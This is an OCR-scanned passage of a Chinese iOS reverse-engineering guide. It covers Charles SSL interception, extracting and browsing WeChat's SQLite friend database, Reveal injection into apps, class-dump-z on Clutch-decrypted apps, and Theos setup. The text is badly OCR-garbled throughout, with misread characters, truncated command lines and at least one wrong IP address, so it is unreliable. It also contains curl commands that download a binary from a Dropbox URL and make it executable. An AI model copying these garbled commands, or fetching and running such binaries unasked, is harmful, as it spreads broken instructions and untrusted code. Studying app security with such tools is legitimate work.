Pema INST EE :00:48 FM -=-= lagin 
| Hide Certificate | Don't Trust Always Trust D 004a og 
c : [3, 3:40:11 PM -- login 


x x 


点 击 其 中 的 “Always Trust?， 然 后 输入 自己 的 账号 密码 给 它 授 权 。 


可 以 从 Keychain 中 查看 授权 之 后 的 结果 : 








Key cha n Access File Eat vie a ik = ndow — Help — — - — - 3 - = Lae! 一 一 = £ 
TEFS Keychain Access 


af’ Click ta lock the login keychain. 

















Keychains - 
| 4f login Charles Proxy $$L Proxying 
A iCloud Root certificate authority — | | 
B System Expires: Friday, September 24, 2038 at 11:19:05 AM China Standard Time 
= O This certificate i$ marked as trusted for this account 
[5 System Roots 
pcc — — — ——— — — A Kind Expires Keychain 
一 = certificate Mar 29, 2016, 11:35:39 AM login 
| Charles Proxy SSL Proxying certificate Jan 22, 2016, 10:17:26 AM login 
| Root certificate authority - certificate Dec 1, 2033, 9:25:26 PM — login 
| Expires: Friday, September 24, 2038 at 11:19:05 AM China Standard Time [fj | certificate Feb 15, 2019, 12:42:24 PM login 
| © This certificate is marked as trusted for this account | certificate Dec 31, 2031, 3:26:39 PM login 
— certificate Dec 31, 2026, 3:27:03 PM login 
Í v Detaiis | certificate Jul 31, 2014, 11:44:30 AM login 
certificate May 14, 2014, 7:22:21 PM login 
Category | subject Name = certificate jun 3,2014, 3:49:20 PM — login 
H All Items Cons NINE See certificate Feb 15, 2016, 2:56:35 AM login 
4. Passwords | Organizational Unit hrnL/chaclesnroxy,cor/aad certificate Sep 24, 2038, 11:19:05 AM login 
ll Sicura Motar — pis 2 i certificate Dec 25, 2015, 9:27:33 AM login 
[3] My Certificates | = ge adipe | certificate Feb 2, 2027, 6:12:15 AM — login 
State/Province Auckland certificate Apr 21, 2031, 1:37:35 AM login 
sa nave | Country MZ | certificate Aug 23, 2031, 10:34:00 AM login 
Lj Certificates — — certificate Dec 26, 2014, 11:10:30 AM lagin 
| E um "—— certificate Aug 6, 2014, 11:00:10 AM login 
Acid 5 s CE certificate Jun 25, 2014, 10:38:50 AM login 
| um n ee ee certificate Apr 4, 2015, 4:52:50 PM — login 


Organization — XK7Z Ltd | 
| Lecality — Auckland | 
| State/Province Auckland 
| Country Nz | 


模拟 器 上 的 设置 方法 


3.2 网 络 流量 分 析 工 具 Charles 27 


F axhttp://www.charlesproxy.com/assets/install-charles-ca-cert-for-iphone-simulator.zip > #4 
压 之 后 双击 ， 就 可 以 在 模拟 器 上 拦截 SSL 请 求 了 ， 蔓 至 都 不 用 重启 模拟 器 。 


设置 OS 设备 的 代理 


首先 获取 运行 Charles 的 Mac 的 IP 地 址 ， 可 以 打开 命令 行 (Terminal) 输入 ifconfig 得 到 IP 地 
址 。 


或 者 spotlight 打开 Network Utility， 如 下 图 所 示 : 


和 
Network Utility 


Se 


= 4) (ROS Sun3:48PM O i= 









| 


| Tiel) Netstat Ping | Lookup | Traceroute | Whoi Pinger | Part Scan | 





Select a network interface for information. 














| Wi-Fi (end) 
Interface Information Transfer Statistics 
ware Addre 1:25:0f5-c H Sent Packets: 2,867,034 
IP Address; 192.168.0.103 Send Errors; 0 
| k fe Mbit/s Recv Packets: 6,203,938 





Link Status: Active Recv Errors: O 


Vendor: Apple Collisions: 0 
Model: Wireless Network 
Adapter (802.11 a/b/a/ 
n) 





然后 在 iDS 设 备 的 WiFi 网 络 中 设置 代理 ， 如 下 图 : 


iOS 安全 Wiki 


eevee HEHE > Tr3:50 tmm 
€ 无 线 局 域 网 Tenda 2B88F8 


搜索 域 TendaAP 


续 租 


HTTP 代理 





服务 器 193.168.0.103 
im H 3888 


确保 移动 设备 和 Mac 在 同一 个 WIFI 下 面 。 


过 Charles 分 析 iOS 设 备 的 网 络 请 求 


按 下 Record 按 钮 ， 或 者 Proxy 菜 单 里 面 的 Start Recording 即 可 对 iOS 设 备 的 网 络 请 求 进 行 监 
JT o 


Charles $5) 3 fé 


。 拦截 SSL 请 求 
e 模拟 慢 速 网 络 
菜单 Proxy 中 的 Throttle Setting 可 以 对 此 进行 设置 
e 支持 修改 网 络 请 求 包 并 多 次 发 送 
e 断 点 功能 
Charles 12.93 B 2] Z i*35 Ray (X fxRequest) 和 请 求 后 (医改 Response) 
e 捕获 记录 控制 可 以 过 滤 出 关注 的 请 求 。 杀 单 Proxy 中 的 Record Setting 可 以 对 此 进行 


设置 
暂时 不 展开 介绍 这 些 功能 ， 这 里 介绍 再 多 都 比 不 上 自己 运行 几 分 钟 的 效果 好 。 
小 结 
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Charles 还 有 很 多 强大 的 功能 等 待 大 家 挖 气 ， 欢 迎 大 家 使 用 下 体验 下 这 些 功 能 。 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


简介 


SQLite， 是 一 款 轻 型 的 数据 库 ， 是 遵守 ACID 的 关联 式 数据 库 管 理 系 统 ， 它 的 设计 目标 是 效 入 
式 的 ，iOS 和 Android 都 支持 。 


如 果 有 很 多 数据 要 存在 本 地 ， 保 存在 SQLite 数 据 库 是 一 个 很 常见 的 做 法 ， 很 多 iOS 应 用 都 是 这 
样 做 的 。 


在 iDOS 逆 向 工程 中 ， 有 时 候 需 要 把 iDS 设 备 中 的 SQLite 数 据 库 文件 拷贝 到 Mac 上 ， 然 后 用 工具 
打开 ， 钊 用 的 有 SQLite Database Browser 和 SQLiteManager。 


下 载 SQLite Database Browser 
SQLite Database Browser 可 以 从 这 里 下 载 。 


下 载 之 后 安装 运行 ， 如 下 图 所 示 : 


E SQLite DAD Browser 


i Object | Type | Schema 











SQLite Database Browser] + 


用 前 面 介 绍 的 工具 iFunbox( 如 果 你 不 知道 这 个 工具 ， 请 阅读 本 系列 前 面 的 文章 ) 从 微 信 的 目录 
下 拷贝 出 一 个 SQLite 数 据 库 文件 : 


iOS 安全 Wiki 





| MM.sqlite | 
|. | flowStat.db 12 KB 








微 信 Documents >0995d4793407da4caea4f4a98f542ed8 5 DB | 





M SQLite Database Browser 打 开 之 后 ， 点 击 Table 可 以 得 到 一 个 下 拉 列 表 ， 显 示 所 有 的 
Table， 如 下 图 所 示 : 





Chat lfd70d26bfafcB49b77b560446fDace2 L 
Chat, 213f56f97bfbab43037a24655f3e0df1 gps IPhone | IPhone 45 - nn | 
lac Cop  ChatExt2 213f56197bfbab43037a24655f3e0df1 | Current Device Switch 
| Chat 62e076d5alalc3837f1ed2c2774a4132 p Size - Type 


Chat, f681152d519952d09a91a22986e18f5235 | 
ChatExt2_f681f2d519952d09a91a2298e18f5235 一 一 = 
Chat, feddc506a66a306323cb628[2946c lef 


~ DuplicateMsgTable au- 
Chat. BBcb7cd602a4 1bfb664e6a31f40606de W esso 
Chat 7cd4Bbf4870db87e7daa737039aabÜeb 
Table ChatExt2 7cd4Bbf4870db87e7daa737039aabÜeb 3 | New Record || Delete Record | 
Chat, 4c28e51081112a61c8d20705ca31a54a 
ChatExt2 4c28e51081112a61c8d20705ca31a54a |. [ConmRes2? — |ConSuResi | Constr 
Chat_1349ed9a¢B8f32a2f2Sd8achd7bb3447 
ChatExt2. 1349ed9a488532a2125dBacfd7bb3447 
Chat, d274cad5794c73eb13728666 7a3ff9ce 
ChatExt2, d274cad5794c73eb137286667a3ffüce 
Chat, f565567053e4c75cc283310976d2403b 
Chat. 604£335436016c104e6749ae2bfccdl1b 
ChatExt2 15e5567953e4c75cc28331097602403b 
Chat, 57fd72fb91f9a0e1187b20c45d0793a8 
ChatExt2. 57[d721b01/9a0e1187b20c45d0703a8 
Chat, dBbü0edB1b1f5698282b744fe14c5778 
ChatExt2. dBbÜedB1b1f5698282b744fe14c5778 
Chat_5f1022f04e lcBa0Gc&b35fe524da4fec 
ChatExt2, 511022f04e1cBa06cBb35feS24dadfec 
Chat_b90icfSde LOB 7bad60457fa905684ec1 
ChatExt2, b9O01cf5dc1087bad60457fa9056B4ec1 
Chat. üf3babf5ee4dbbÜceaB949b76845a4c2 


in/Desktop/MM.db 








ChatExtZ Of3babfSee4dbbÜceaBD40b76845a4c2 
ChatExt2. 1fd70d26bfafc649b77b560446fDaceZ2 
Chat 3cf$57790555a9d8d34296937d6aBb6aB 
ChatExt2 3cf57790555a0d8d14296937d6aBb5aB 


j Chat, 839843874417a858b91a3d955424aaa5d 
<| 





其 中 的 Friend 这 个 表 ， 然 后 点 击 第 一 个 tabDatabase structure 可 以 查看 表 结 构 ， 第 二 个 
tabbrowse data 可 以 查看 保存 的 数据 ， 如 下 图 所 示 : 
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| | TableVer | UsrName | NickName | Uin | Email | Mob » 
ja 1|masssendapp EAR] o | E 
Iu | ! 

12... lwoicevoipapp | 语 闪 通话 | — 0| —  — — | 
TE eineetape B q 

| | lgsweorad Gee | 0 

15 | I 

ET 1 m Hi^ | — 0 — o 

17 | kaa ea i~ 

jis | 1| facebookapp Facebook —_ 一 一 一 9 一 一 一 一 
|19 anen mmoga | 0 

j20.... Lbrandsessionholder Rg 
jz. oT 

122 | 

EM 1|gh 22b87fa7cb3c 

24 | 1 gh. 52efaa4030af —— 


[< ]1-315of315| > | 


其 中 的 UsrName 这 一 列 就 可 以 用 来 添加 好 友 了 ， 上 比如 在 微 信 中 添加 好 友 的 输入 框 中 输 
入 gh_62efaa4930af 就 可 以 添加 李开复 。 


点 击 第 三 个 Tab， 可 以 输入 需要 执行 SQL 语 邵 。 


SQL string: 
| SELECT * from Friend 














| Execute query | 


Error message from database engine: 

No error 

Data returned: 
.TabieVe|UsrNam|NickNar|Uim [Email |Mobile |Sex — |FullPV |Short?Y|Img [Type |LastCha| Draft | 


|2 qqmail QQ... 0 0 QQyo...<1>... IMG_... 3 0 
1 ames... QAR... 0 0 QQli.. cls. IMG... 3 ü 
il tmes... 0 v0 l>a IMG... 3 ð 
d float. FAM 0 0 paoli.. <1»,,. IMG... 3 0 
| medi... 语音 ..。 O ü yuyin... el»... IMG_.. 3 0 
p qqsync 通讯 ..。 Ü 0 <1>... IMG... 1 i) 
|1 news. Big. 0 0 l>a IMG... 1 0 
j4 feeds... AH 0 ü el»... IMG .. 1 ü 
L3 pner Wii n hn six IE 1 n 
小 结 
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本 文 简单 介绍 了 SQLite 工 具 SQLite Database Browser 的 用 法 。SQLiteManager 也 可 以 完成 类 
似 的 功能 ， 读 者 可 以 下 载体 验 下 这 个 工具 。 


可 以 看 出 ， 应 用 保 和 存在 iDS 设 备 上 的 SQLite 数 据 ， 有 是 很 容易 被 他 人 获取 的 ， 设 备 无 需 越 狱 。 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


Reveal 简介 
Revel 4 47iIOS & AMUIA] S : 


Reveal 能 够 在 运行 时 调试 和 修改 iDOS 应 用 程序 。 它 能 连接 到 应 用 程序 ， 并 人 允许 开发 者 编辑 
各 种 用 户 界 面 参 数 ， 这 有 反 过 来 会 立即 有 反应 在 程序 的 UI 上 。 就 像 用 FireBug 调 试 HTML 页 面 
一 样 ， 在 不 需要 重 写 代码 、 重 新 构建 和 重新 部 溪 应 用 程序 的 情况 下 就 能 够 调试 和 修改 iOS 
用 户 界 面 。--InfoQ 


Reveal 运 行 在 Mac 上 ， 目 前 的 最 新 版 本 是 1.0.4， 可 以 从 这 里 下 载 ， 要 求 Mac OS X 10.8 及 以 
上 上 上，iOS 6 以 及 以 上 。 


现在 正式 版 本 可 以 下 载 试用 30 天 ， 试 用 期 后 需要 购买 。 有 需要 的 话 可 以 买 一 个 ， 功 能 相当 强 
ko 


Reveal 的 功能 


查看 iOS 应 用 的 View 层 次 结构 


使 用 Reveal 的 效果 如 图 


Free trial ends in 14 days 
App Store (jamz-touch) C] ulScreen C 
=q App Store 2.0 
jamz-touch (iOS 7.0.6) 
v [ ] UlScreen: Main Screen 
v [F ulWindow 
v'i ‘UlLayoutContainerView 


Application 


wee Icon Badge Number 0 
v:_'UlTransitionView 
Vv‘ _'UIlViewControllerWrapperView 
v: ‘UlLayoutContainerView IR'S ( / State Active 
v'i ‘UINavigationTransitionView SNe 
v: ‘UlViewControllerWrapperView Apps for Making Movies - 
LAB IT 
YL ‘UlView 
了 辣 UlICollectionView 
Y '_1SKUISimpleCollectionViewCell . ; = Status Bar Frame 
vi IUIView rs : 
v' ISKUISwooshView 
UGY 
> æ UlButton 
ARIETA 
v [| UlCollectionView ome n | Status Ba...ientation Portrait 
v' ‘SKUISoftwareSwoo: 
YL 1IUIView 
Œ] SKUICellimag 


Status Bar Animation 0.3 


网 UILabel 
ARTELE 
ARIETA 

b iSKUISoftwareSwoo: 


Device 


Identifier for Vendor 51080FE4-1643-45C3... 


v'i 'SKUISoftwareSwoo: EN A een jamz -touch 
v' 1UIView pp 
Œ] SKUICelllmag 


Model iPod touch 


Localized Model iPod touch 
LA TUTTA 


Sy : 
-"u rs -Li System Name iPhone OS 





图 中 最 左 侧 可 以 看 到 View 的 名 称 ， 中 间 是 View 的 3D 展 示 效 果 ， 可 以 非常 清楚 的 看 到 View 的 层 
A 2544 o 


修改 参数 后 无 需 编 译 即 可 看 到 效 


Reveal 另 一 个 非常 有 用 的 功能 就 是 动态 修改 参数 ， 无 需 编 辑 动态 查看 效果 。 如 下 图 所 示 : 


EN DeLee eat 
© 1 TMCollec 
团员 Imag 
bleViewCell 
TableViewle 
! LIITableView 
i 1 TMCollec 
Fa) Ulimag 
bleViewCell 
TableViewCe 
' UlTableView 
: 1 TMColleci 
Fal Ulimag 
leViewCell 


(UiTableView 
© 1 TMCollect 
FE) Ulimag 
ye ViewcCaell 
TableViewCe 
i UiTableview 
' 1 TMCollec 
回 Ullmag 


E UlScreen 


PR RARER 正品 宜兴 此 
RSE AL PDI se A 
¥ 1278.02 


品 资 汇 WEARER SAT aE 珍珠 
Tli tr [IRE Be SE Se a Se 
X 44.26 


Aou pr^ 
T 


tid 竹 制 茶道 六 君子 套装 RR 
荣 勺 茶杯 垫 塞 组 功 去 茶具 配件 C 
¥ 30.00 


j| 
T Hd 


ILE Dd cU SE A Be 
精品 荣 道 居家 陶瓷 摆件 禅 趣 茶 
* 49.01 


RANA BIR EUN 
SLA Sh Bars ERD Tee RI 
Y 197.90 


ran 


Adjusts Fant Size to... 
Adjusts Letter Spaci... 
Baseline Adjustment Align Baselines 
Enabled 
Helvetica Neue Inte... 
Mediu... = 
Highlighted 
Highlighted Text (== None (Nil) 
Hex 
Line Break Mode | Truncating Tail 
Min Scale Factor 1 
Number of Lines 1 
Max Layout Width Ü 
Shadow = Current Color 
FOO000000 Hex 


Shadow Offset of 


Height 


Text Alignment 
Text Current Color 


#FFOOOO00 Hex 





UlView 


显示 出 UILabel 和 UIView 的 关键 属性 值 ， 更 重要 的 是 ， 这 些 都 可 以 动态 修改 ， 比 如 我 们 改 成 测 
试 ， 如 下 图 : 


UiLanDel 


Adjusts Font Size to... 


测试 Adjusts Letter 5paci... 


Baseline Adjustment Align Baselines 








EE ZAER it Emi v Enabled 
IDR RIPARIAN Font Helvetica Neve Inte... = 
* 1278.02 





Mediu... = l7 = 


Highlighted 
pee. 雪花 釉 陶 次 茶叶 三 珍珠 Highlighted Text | aa None (Nil) 
HGCA Baa esse T 
X 441.26 Bx 
; Line Break Mode — Truncating Tail 


> Min Scale Factor 1 
祥 福 竹 制 茶 道 六 君子 套装 茶 实 | 
Jee A 功夫 茶具 配件 C Number of Lines 1 


M on 
É 30.00 Max Layout Width O 
1601 


Shadow 2B Current Color 


品 资 汇 eee | NS) ECTS Fe PR #00000000 Hex = 
Th CIES Se) SER AT PRE Shadow Offset OF 0- 
¥ 49,01 | Wid Height 


4102 Text | 测试 


E. € 3 eK fif 石头 茶盘 茶 海 as Text Alignmen 
ele: E LARS RE RAR A Text Current Color 


¥ 197.90 — 
Id Oc #FFOO0000 Hex 





把 其 中 的 图 片 的 宽度 从 80 改 成 50， 改 之 后 的 效果 如 图 : 


回 UlScreen 


UllmageView 


TEM Animation Duration Ü 
测试 


Animation Count 0 


Highlighted 


Fe SASS 正品 宜兴 紫 
aA 电磁 炉 功 去 菜 具 黑 檀 木 


¥ 1278.02 la 


ibid Identifier 
品 资 汇 STEMS eK Alignment Rect Insets 
AGE A EHH 菜 器 茶道 op Bottom 
¥ 44.26 | 


Right 


EE 0 
TF Jii 


祥 福 竹 制 茶道 六 君子 套装 RR 
AOJSRTRIBESB MARRO 


¥ 30.00 Background | w= None (Nil) 


+ Autoresizes Subviews 


Bounds 


品 资 汇 Heeb Bs) Fie) SRR 


精品 茶道 居家 陶瓷 摆件 MMH - j 
Y 和 -一 Width Height 


4102. 
Center 


Km BLS md | 
实木 汝 窗 陶 次 宜兴 紫砂 功夫 茶具 F Clears Context Befo... 
¥ 197.90 Clips To Bounds 


Content Mode Scale To Fill 


Content Scale Factor 1 





下 图 箭头 所 指向 的 对 方 都 可 以 动态 修改 。 


100% M 


Shadow Offset 
Width Height 


m e 和 车 品 专营 记 


Text Alignment | Left 
Text Current Color 


#FF000000 Hex 


UlView 


安然 潮流 服饰 Identifier 


£T: EE 2009 
Serena > Alignment Rect Insets 
Ux ey Ms, i: 1037 


Bottom 


Apple Store 官方 旗舰 店 Right 


AK. Lr m LL zm gs -一 一 和 > Alpha 
A ig. applestore E FMS P 


lr ex AL: 28532 ~ Autoresizes Subviews 
Background ^ —m Current Color 


veromoda 官 方 旗舰 店 #00000000 Hex 


SB: veromoda E Amite b. Bounds 0 - 


收藏 人 气 : 2116800 


Width Height 


Center 


雅戈尔 官方 


舰 店 


| < | J 
x p, E va 


Clears Context Befo... 


Clips To Bounds 





Content Mode | Left 


关于 Reveal 的 更 多 功能 ， 欢 迎 大 家 去 探索 并 分 享 。 下 面 介绍 Reveal 如 何 集 成 到 iOS 应 用 中 去 调 
试 。 


Reveal 的 3 种 加 载 方法 


加 载 方法 (1) 

下 载 Reveal 之 后 打开 ， 在 菜单 中 的 Help 中 可 以 找到 集成 到 Xcode 项 目的 方法 ， 这 里 不 再 乾 
yii [9] 

加 载 方法 (2 ) 


Integrating Reveal without modifying your Xcode project 
reveal: 检视 iOS app 的 view 结构 。 
给 出 了 如 何不 用 修改 Xcode 工程 就 可 以 加 载 使 用 Reveal 的 方法 。 


在 当前 用 户 目 录 新 建 一 个 文件 .lldbinit， 位 于 ~/.lldbinit，LLDB 每 次 启动 的 时 候 都 会 加 载 这 个 文 
件 。 


在 .lldbinit 中 输入 如 下 内 容 : 


command alias reveal load sim expr (void*)dlopen("/Applications/Reveal.app/Contents/Share 
command alias reveal load dev expr (void*)dlopen([(NSString*)[(NSBundle*)[NSBundle mainBu 
command alias reveal start expr (void)[(NSNotificationCenter*)[NSNotificationCenter defau 


command alias reveal stop expr (void)[(NSNotificationCenter*)[NSNotificationCenter defaul 
BENE 


上 述 文件 创建 了 4 个 命令 : 





reveal load sim,reveal load dev, reveal start 和 reveal stop 


© reveal load sim 个 只 在 iOS 模 拟 器 上 有 效 。 它 从 Reveal 的 应 用 程序 bundle 中 找到 
"yer moe rl (请 确保 你 把 Reveal 安 装 到 了 系统 的 Application 文 件 夹 ， 如 果 
你 换 地 方 了 ， 你 修改 上 述 的 文件 ) o 


* reveal load dev 这 个 命令 在 iOS 设 备 和 模拟 器 上 都 有 效 (Wu 需要 你 在 Build 
Phase 中 的 的 Copy Bundle Resources ¥ #7 LlibReveal.dylib : a 
Link Binary With Libraries 这 个 地 方 。 


9€ reveal start 这 个 命令 发 出 一 个 通知 局 动 Reveal Server » 
e reveal stop 这 个 命令 发 出 一 个 通知 停止 Reveal Server » 


请 注意 : 只 有 在 iDOS 应 用 发 出 了 UIApplicationDidFinishLaunchingNotification 通 知之 后 ， 比 如 
应 用 的 delegate 已 经 处 理 过 application::didFinishLaunchingWithOptions: 之 后 才能 调用 上 面 
的 reveal load * 命令 ， 然 后 再 调用 reveal start 


在 设备 起 来 之 后 ， 你 就 可 以 断 下 应 用 ， 在 LLDB 提 示 框 中 输入 上 述 的 命令 了 


[ Thread 1 > 0 mach, msg trap 
(Lldb) reveal load dev 
reveal load dev 


reveal load sim 





reveal start 
reveal stop 


上 述 的 过 程 还 需要 手动 输入 ， 下 面 介 绍 如 何 设 置 条 件 断 点 ， 使 得 Reveal 在 尼 动 之 后 目 动 加 
Ho 


在 你 的 应 用 的 application:didFinishLaunchingWithOptions 中 的 代码 出 加 一 个 断 点 ， 然 后 右 
键 ， 选 择 编辑 断 点 。 


输入 如 下 图 一 样 的 命令 : 


|  & TMAppDelegate.m:87 


Condition [0 
Ignore 0 |(: times before stopping 


Action | Debugger Command " E) 


reveal load dev 


-u-— 00 o0 LÀ o LP o Ao 7709. 


Debugger Command = 十 ) [一 
| reveal start 


| Options i Automatically continue after evaluating 
A 


重新 运行 下 应 用 ， 如 果 控 制 台 输 出 了 如 下 信 ， 


(m 


Reveal server started. 


说 明 Reveal 已 经 自动 成 功 加 载 。 


加 载 方 法 (3) 
Reveal 查 看 任意 app 的 高 级 技巧 介绍 了 如 何在 越狱 设备 上 查看 任意 app 的 技巧 : 
e iOS 人 设备 需要 越狱 ，iOS6 以 上 
e 安装 Reveal， 越 狱 设 备 与 安装 Reveal 的 Mac 在 同一 wifi 内 。 
e i Help / Show Reveal Library in Finder， 获 取 libReveal.dylib 
e 将 libReveal.dylib 上 传 到 设备 的 /Library/MobileSubstrate/DynamicLibraries 


e 编辑 并 上 传 一 个 libReveal.plist， 格 式 和 /Library/MobileSubstrate/DynamicLibraries 下 面 
的 其 他 plist 类 似 ， 其 中 的 filter 的 bundle 写 要 查看 的 OS App 的 bundle Id。 格式 如 下 : 


( Filter = ( Bundles = ("你 要 查看 的 app 的 bundle Id" ); }; ! 


e FRIOS 


本 文 简要 介绍 了 Reveal 的 功能 和 几 种 加 载 方法 。 欢 迎 大 家 去 体验 下 Reveal 的 强大 功能 。 最 
后 ， 可 以 看 看 关于 Reveal 的 tips:Reveal tips: Navigation 。 
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#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


3.4 Reveal : 分 析 iOS UI 的 利器 
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class-dump-z f 7+ 


class dump — 4-4 4- 4T LS » OMM 的 iOS 二 进 制 文件 的 头 文件 信 息 
(后 面 我 们 会 介绍 破解 |OS 应 用 的 工具 Clutch, 这 个 工具 需要 安装 在 iOS 设 备 上 ， 所 以 放 在 下 一 
章 介 绍 ) 。 


这 些 信 息 与 otool -ov 命令 提供 的 信息 是 一 样 的 ， 但 它 更 紧凑 ， 更 易 读 。 

为 什么 要 使 用 class-dump 

你 可 以 看 到 闭 源 应 用 程序 ， 框 架 (framework) 和 软件 包 (bundle) 的 头 文 件 ， 了 解 它 内 部 是 如 何 
设计 的 。 

下 载 与 安装 

可 以 从 这 里 http://networkpx.googlecode.com/files/class-dump-z 0.2a.tar.gz 下 载 。 


执行 如 下 命令 解压 文件 并 把 可 执行 程序 拷贝 到 /usr/bin 目 录 : 





如 下 图 所 示 : 


E ZPs-MBP:class-dump-z admin$ tar -zxvf class-dump-z 0.2a.tar.gz 
x LICENSE 

X README 

x iphone_armv6/ 

x iphone armv6/class-dump-z 

x iphone armv6/README 

x Linux_x86/ 

x Linux_x86/class—dump-z 

x Linux_x86/README 

x mac x86/ 

x mac, x86/class-dump-z 

x win_x86/ 

- win_x86/class—dump-z.exe 

| ZPs-MBP:class-dump-z admin: sudo cp mac, x86/class-dump-z /usr/bin/ 
Password: 
ZPs-MBP:class-—dump-z admin$ ls /usr/bin/cla 

| clang clang++ class-—dump-z 
ZPs—-MBP:class-dump-z admin$ ls /usr/bin/cla 

clang clang++ class—dump-z 

ZPs-MBP:class-dump-z admin$ ls /usr/bin/class-dump-z 

/usr/bin/class-dump-z 





现在 ， 在 命令 行 输入 class-dump-z， 你 可 以 得 到 如 下 的 提示 信息 : 


ZPs-MBP:class-dump-z admin$ class-dump-z 
Usage: class-dump-z [<options>] «filename» 
where options are: 


Analysis: 
-p Convert undeclared getters and setters into properties (propertize). 
-h proto Hide methods which already appears in an adopted protocol. 
-h super Hide inherited methods. 
-y «root» Choose the sysroot. Default to the path of latest iPhoneOS SDK, or /. 
-u «arch» Choose a specific architecture in a fat binary (e.g. armv6, armv7, etc.) 


Formatting: 
-a Print ivar offsets 
-A Print implementation VM addresses. 
-k Show additional comments. 
-k -k Show even more comments. 
-R Show pointer declarations as int *a instead of int* a. 
-N Keep the raw struct names (e.g. do no replace _ CFArray* with CFArrayRef). 
-b Put a space after the +/- sign (i.e. + (void)... instead of +(void)...). 


-i «file» Read and update signature hints file. 


Filtering: 
-C «regex» Only display types with (original) name matching the RegExp (in PCRE synta 
-f «regex» Only display methods with (original) name matching the RegExp. 


-g Display exported classes only. 
-X «list» Ignore all types (except categories) with a prefix in the comma-separated 
-h cats Hide categories. 


-h dogs Hide protocols. 


Sorting: 

-S Sort types in alphabetical order. 

-S Sort methods in alphabetical order. 

-Z Sort methods alphabetically but put class methods and -init... first. 
Output: 

-H Separate into header files 


-0 <dir> Put header files into this directory instead of current directory. 
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上 面 的 -H 命令 可 以 把 头 文件 信息 放 到 各 自 的 文件 中 ，-o 后 面 可 以 指定 一 个 存放 头 文 件 的 目 
K o 


我 们 用 这 两 个 命令 来 到 处 应 用 的 头 文件 信息 。 
e class-dump-z -H AppName/Payload/AppName.app/AppName -o storeheaders 


再 一 次 提醒 一 下 ， 这 里 的 应 用 是 用 Clutch 破 解 之 后 的 ， 如 果 让 接 用 class-dump-z dump 从 App 
Store 下 载 的 二 进 制 文件 ， 只 能 得 到 加 密 后 的 信息 。 


下 一 章 iOS 设 备 上 的 工具 会 详细 介绍 Clutch 的 用 法 


获得 iOS 应 用 程序 的 类 信息 


之 前 我 翻译 过 一 篇 文章 iOS 应 用 程序 安全 (2)- — 用 程序 的 类 信息 ， 里 面 分 别 以 Apple 自 
带 的 地 图 和 从 App Store 下 载 的 Yahoo 天 气 为 例 ， 介 绍 了 class-dump-z 获 得 IOS 应 用 程序 的 详细 
过 程 。 
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本 文 简要 介绍 了 class-dump-z 的 作用 ， 下 载 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


^ 安装 和 具体 用 法 。 


3.5 使 用 class-dump-z 获 得 iOS 应 用 程序 的 类 信息 
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开发 越狱 程序 和 日 第 开发 的 iOS 程 序 很 相似 ， 不 过 ， 越 狱 程序 能 做 更 强大 的 事情 。 你 的 设备 越 
狱 之 后 ， 你 就 能 够 hook 进 Apple 提 供 的 几乎 所 有 的 class， 来 控制 iPhone/iPad 的 功能 。 


@DHowett 的 Theos 大 幅 简 化 了 编写 越狱 程序 的 流程 。DHowett 介 绍 了 如 何 再 Mac 和 Linux 上 开 
发 IOS 越 狱 程 序 ， 本 文 将 只 介绍 如 何在 Mac 上 开发 。 


本 文 将 一 步 步 介 绍 写 越狱 程序 需要 的 工具 ， 在 这 个 过 程 中 介绍 Theos 的 用 法 和 功能 。 


越狱 程序 开发 需要 安装 的 工具 
HAY 安装 iOS SDK 


Ak http://developer.apple.com/devcenter/ios/index.action- F 3X 36 X o& 31469 Xcode » €. d E 4 
有 最 新 的 iDOS SDK » 


第 2 步 设置 环境 变量 
建议 把 theos 安 装 在 /opt/theos ， 打 开 命 令 行 然后 输入 


export THEOS-/opt/theos 


通过 在 命令 行 执 行 echo $THEOS 可 以 看 到 这 个 变量 是 否 正确 设置 。 如 果 是 这 样 设 置 ， 每 次 你 
命令 行 都 需要 重新 设置 一 下 ， 你 也 可 以 编辑 /etc/profile 文 件 ， 把 上 面 那 一 行 添加 进去 ， 这 
样 不 用 每 次 打开 命令 行 都 重新 设置 一 次 。 


svn co http://svn.howett.net/svn/theos/trunk $THEOS 


会 把 theos 下 载 到 Step2 所 设置 的 目录 中 ， 会 提示 你 输入 admin 的 完 码 。 

43 : T £ldid 
Idid 的 作用 是 模拟 给 iPhone 签 名 的 流程 ， 使 得 你 能 够 在 丨 实 的 设备 上 安装 越狱 的 apps/hacks。 
你 可 以 在 很 多 地 方 都 找 得 到 这 个 tool， 不 过 DHowett 在 他 的 dropbox 中 给 大 家 存 了 一 份 。 


通过 下 面 的 命 X 令 下 载 : 


curl -s http://dl.dropbox.com/u/3157793/1did > -/Desktop/ldid 
chmod +x -/Desktop/ldid 
mv ~/Desktop/ldid $THEOS/bin/ldid 


先是 下 载 到 桌面 ， 然 后 改 执行 权限 ， 然 后 移动 到 指定 目录 。 


你 可 以 尝试 下 看 看 直接 下 载 是否 Ok 

curl -s http://dl.dropbox.com/u/3157793/ldid > $THEOS/bin/ldid; chmod +x S$THEOS/bin/ldid 
d 
由 于 伟大 的 墙 ， 下 载 这 个 你 需要 目 备 梯 子 。 
注 : 我 把 这 个 工具 下 载 下 来 放 到 了 http://pan.baidu.com/s/1kKTHolGZ， 也 可 以 从 这 里 下 载 ， 然 
后 给 它 添加 执行 权限 (chmod +x Idid) 并 移动 到 $THEOS/bin/ 这 个 目录 下 。 
第 5 步 :安装 dkpg 
dpkg 能 够 把 你 的 app 打 和 包 成 Debian Package, 可 以 分 发 的 Cydia 的 存储 目录 中 。 


brew install dpkg. 


也 可 以 用 另 一 个 工具 Cakebrew 来 安装 dpkg。 


第 6 步 : 创建 新 项 目 


theos 使 用 一 个 叫做 nic(new instance tool) 的 工具 来 创建 新 的 工程 。 执 行 下 面 的 命令 


$THEOS/bin/nic.pl 


就 可 以 开始 创建 。 下 面 是 一 个 创建 jailbroken 应 用 程序 的 例子 


author$ $THEOS/bin/nic.pl 
NIC 1.0 - New Instance Creator 


[1.] iphone/application 
] iphone/library 
[3.] iphone/preference bundle 

[4.] iphone/tool 

[5.] iphone/tweak 
Choose a Template (required): 1 
Project Name (required): firstdemo 
Package Name [com.yourcompany.firstdemo]: 
Author/Maintainer Name [Author Name]: 
Instantiating iphone/application in firstdemo/.. 
Done. 


简单 这 样 的 命令 ， 就 创建 了 一 个 基本 的 越狱 程序 firtdemo, 它 除了 常规 的 文件 外 ， 还 包含 了 
